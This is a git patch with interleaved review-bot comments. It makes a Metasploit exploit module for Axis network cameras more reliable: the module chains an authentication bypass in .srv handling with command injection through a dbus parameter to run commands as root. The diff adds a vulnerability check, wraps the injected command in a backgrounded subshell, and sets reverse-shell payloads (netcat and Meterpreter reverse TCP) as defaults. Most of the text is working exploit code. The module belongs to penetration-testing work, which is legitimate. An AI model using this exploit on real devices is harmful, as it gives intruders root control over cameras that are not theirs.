From 097a00bcab1d8439b2aeb833679bd3b01fc1814a Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Thu, 4 Oct 2018 10:10:28 -0500
Subject: [PATCH] Land #10712, Make exploit/linux/http/axis_srv_parhand_rce more stable
---
 .../linux/http/axis_srv_parhand_rce.rb | 76 ++++++++++++-------
 1 file changed, 50 insertions(+), 26 deletions(-)
diff --git a/modules/exploits/linux/http/axis_srv_parhand_rce.rb b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
index b3f3d68bcb..bbd7aa9ab0 100644
--- a/modules/exploits/linux/http/axis_srv_parhand_rce.rb
+++ b/modules/exploits/linux/http/axis_srv_parhand_rce.rb
@@ -12,12 +12,12 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Axis Network Camera .srv to parhand RCE', - 'Description' => %q{ + 'Name' => 'Axis Network Camera .srv to parhand RCE', + 'Description' => %q{ This module exploits an auth bypass in .srv functionality and a command injection in parhand to execute code as the root user. }, - 'Author' => [ + 'Author' => [ 'Or Peles', # Vulnerability discovery (VDOO) 'wvu', # Metasploit module 'sinn3r', # Metasploit module
@@ -28,40 +28,62 @@ class MetasploitModule < Msf::Exploit::Remote 'Chris Lee', # Metasploit module 'Cale Black' # Metasploit module ], - 'References' => [ + 'References' => [ ['CVE', '2018-10660'], ['CVE', '2018-10661'], ['CVE', '2018-10662'], ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'], ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf'] ], - 'DisclosureDate' => 'Jun 18 2018', - 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_ARMLE], - 'Privileged' => true, - 'Targets' => [ + 'DisclosureDate' => 'Jun 18 2018', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_ARMLE], + 'Privileged' => true, + 'Targets' => [ ['Unix In-Memory', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'Payload' => { - 'BadChars' => ' ', - 'Encoder' => 'cmd/ifs', - 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat-e'} - } + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => { + 'BadChars' => ' ', + 'Encoder' => 'cmd/ifs', + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat-e' + } + }, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + } ], ['Linux Dropper', - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'Type' => :linux_dropper + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'Type' => :linux_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' + } ] ], - 'DefaultTarget' => 1, - 'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'} + 'DefaultTarget' => 1, + 'DefaultOptions' => {'WfsDelay' => 10} )) end + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => "/index.html/#{rand_srv}" + ) + + if res && res.code == 204 + return CheckCode::Appears + end + + CheckCode::Safe + end + def exploit case target['Type'] when :unix_memory 
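Review bot: In the added `check` method, a missing response falls through to `CheckCode::Safe`, so a timeout or refused connection is reported the same way as a host that answered and rejected the probe. A nil `res` only shows that nothing was learned, so it should map to `CheckCode::Unknown`: `return CheckCode::Unknown unless res` followed by `return CheckCode::Appears if res.code == 204`. Anyone using `check` to confirm that a camera has been patched would otherwise read an unreachable device as not vulnerable. A one-line comment saying why a 204 on a random `.srv` path is treated as the indicator would also help, since the hunk does not explain it.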
@@ -72,8 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv" - send_request_cgi( 'method' => 'POST', 'uri' => "/index.html/#{rand_srv}", @@ -81,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote 'action' => 'dbus', 'args' => dbus_send( method: :set_param, - param: "string:root.Time.DST.Enabled string:;#{cmd}" + param: "string:root.Time.DST.Enabled string:;(#{cmd})&" ) } ) @@ -111,4 +131,8 @@ class MetasploitModule < Msf::Exploit::Remote args end + def rand_srv + "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv" + end + end
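Review bot: The rewritten `param:` string in `execute_command` is not explained anywhere in the hunk; the command is now wrapped as `(#{cmd})&`, which presumably runs it in a backgrounded subshell so the HTTP request does not wait on it. A short comment above the `send_request_cgi` call would record that intent, for example `# Background the command so the request returns without waiting for it to finish`. It would also be worth noting there that this pairs with the `'WfsDelay' => 10` default added in the same commit, if that is the reason for the longer wait. `execute_command` starts and ends outside this hunk.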
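Review bot: The new `rand_srv` helper has no comment, and judging by the lone `+` after its `end` a blank line has been added just before the closing `end` of the class. Because every call returns a different name, `check` and `execute_command` never share a path, which is worth stating above the method: `# Returns a fresh random "<name>.srv" path segment on each call`. Dropping the trailing blank line keeps the class body in line with the usual RuboCop layout.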